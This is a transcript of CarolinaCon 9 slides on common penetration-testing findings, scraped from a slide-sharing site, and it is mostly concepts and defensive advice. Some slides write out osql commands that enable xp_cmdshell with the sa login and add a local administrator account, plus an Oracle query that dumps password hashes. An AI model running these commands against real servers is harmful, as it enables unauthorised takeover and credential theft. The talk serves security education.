carolinacon 9 the low hanging fruit of penetration testing presented by: bryan miller
Post on 15-Jan-2016
218 Views
Preview:
TRANSCRIPT
CarolinaCon 9
The Low Hanging Fruit of Penetration Testing
Presented by:
Bryan Miller
CarolinaCon 9
Pen Testing vs. VA vs. Risk Assessments
Penetration Testing Concepts/Issues
What is Low Hanging Fruit
Low Hanging Fruit Examples
Wrap Up
3/16/2013
The Low Hanging Fruit of Penetration Testing 2
AGENDA
CarolinaCon 9
B.S. I.S., M.S. C.S. – Virginia Commonwealth University
Current CISSP, former Banyan CBE & Cisco CCIE
Former adjunct professor – I.S. & C.S. – VCU
ISSA, ISACA, IALR and VA SCAN lecturer
Penetration testing for 11+ years
Published author with 25 years in I.T.
3/16/2013
The Low Hanging Fruit of Penetration Testing 3
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing
Penetration Testingvs.
Vulnerability Assessmentsvs.
Risk Assessments
4
CarolinaCon 9
Penetration Testing Tests for actual vulnerabilities and what can be
exploited Value add comes from putting the pieces together
Vulnerability Assessment Reports on potential vulnerabilities without testing them Assigns risk values to each issue
Risk Assessment More analytical and less technical Great for overviews but IMHO it will never catch LHF
3/16/2013
The Low Hanging Fruit of Penetration Testing 5
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing
Penetration Testing Concepts/Issues
6
CarolinaCon 9
Types of testing
External Testing from outside the security perimeter (firewall)
Internet, dial-in, wireless, physical & social engineering
Usually performed in a black-box approach w/no credentials
3/16/2013
The Low Hanging Fruit of Penetration Testing 7
CarolinaCon 9
Types of testing
Internal What is accessible inside the security perimeter
White-box or black-box depending on goals Tests for effects of automated malicious software
3/16/2013
The Low Hanging Fruit of Penetration Testing 8
CarolinaCon 9
Issues - Requirements definition
Do you need a penetration test, VA or risk assessment? Sometimes you may need more than one
What is the ultimate goal of the test? Physical → Test security cameras, locks and alarms Social Engineering → Test HR policies and procedures Vulnerability Assessment → Patch scan
How do you define success? How do you know if the test succeeded or failed? Sometimes difficult to define for a penetration test
3/16/2013
The Low Hanging Fruit of Penetration Testing 9
CarolinaCon 9
Issues - In-house or outsourced?
In-house Keeping qualified staff happy is a tough job Tools and training can be very expensive Sometimes you just need an unbiased 2nd opinion
Outsourced How do you judge competency? Do they have a methodology, tool list, references? Do they outsource their work? Geography/vertical market coverage
3/16/2013
The Low Hanging Fruit of Penetration Testing 10
CarolinaCon 9
Issues
Deliverables Will the report include specific recommendations? Is there tool output for verification? No boilerplate text!
Remediation If you don’t plan on fixing the issues, don’t waste the time
or money performing the tests
Post-remediation testing Critical to ensure that all issues have been resolved
3/16/2013
The Low Hanging Fruit of Penetration Testing 11
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing
What is Low Hanging Fruit?
12
CarolinaCon 9
The Low Hanging Fruit Top Ten
6. Permissions on data resources
7. Employee security awareness
8. Encryption
9. Policies & procedures
10. Physical security
3/16/2013
The Low Hanging Fruit of Penetration Testing 13
CarolinaCon 9
The Low Hanging Fruit Top Ten
1. Password management
2. Default security controls
3. OS and application patches
4. SQL Injection, XSS, URL issues
5. Wireless access points/modems
3/16/2013
The Low Hanging Fruit of Penetration Testing 14
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing
Low Hanging Fruit Examples
15
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 16
CarolinaCon 9
Turn on “xp_cmdshell” if it’s disabled
1. osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1"
2. osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"3. osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE
master.dbo.sp_configure ‘xp_cmdshell’, 1"4. osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"
Fun with Microsoft SQL
3/16/2013
The Low Hanging Fruit of Penetration Testing 17
CarolinaCon 9
Add administrative user
1. osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'"
2. osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'"
More Fun with Microsoft SQL
3/16/2013
The Low Hanging Fruit of Penetration Testing 18
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 19
TheTrouble
withVNC
CarolinaCon 9
There are many ways to get the VNC password hashes…
3/16/2013
The Low Hanging Fruit of Penetration Testing 20
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 21
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 22
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 23
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 24
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 25
CarolinaCon 9
Dumping password hashes – non-privileged account
1. Logged in as “dbsnmp”, we ran the following query:
select username, password from dba_users;
DBSNMP AE1E40C725DFCAC8 AQADMIN 739EF27E22AC39DC SYS C10A280B9CFF9A72 SYSTEM 04D19DEFD642AF20
Fun with Oracle
3/16/2013
The Low Hanging Fruit of Penetration Testing 26
CarolinaCon 9
2. Ran CheckPWD:
3/16/2013
The Low Hanging Fruit of Penetration Testing 27
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 28
Reboot via Compaq Insight Manager (CIM)
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 29
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 30
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 31
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 32
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 33
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 34
Appliances are not immune….
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 35
Downloaded passwd, shadow, host files
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 36
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 37
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 38
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 39
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 40
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 41
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 42
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 43
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 44
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 45
Looks like we can
request any file?
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 46
OK, we’ll
ask for the
password file.
Next up, JTR!
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 47
This is why PCI doesn’t allow WEP
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 48
What the fake telephone repairman saw…
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 49
The danger of scripts laying around…
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing
Wrap-Up
50
CarolinaCon 9
Data breaches affect your organization’s reputation and can cost you money.
Software is becoming more complex while attacker tools are becoming easier to use.
Data breaches can be reduced by following best practice rules to eliminate LHF.
3/16/2013
The Low Hanging Fruit of Penetration Testing 51
CarolinaCon 9
Remember the 3 P’s:
Policies & Procedures
Password Management
Patching
3/16/2013
The Low Hanging Fruit of Penetration Testing 52
CarolinaCon 9
3/16/2013
The Low Hanging Fruit of Penetration Testing 53
Q&ABryan Miller
bryan@syrinxtech.com
top related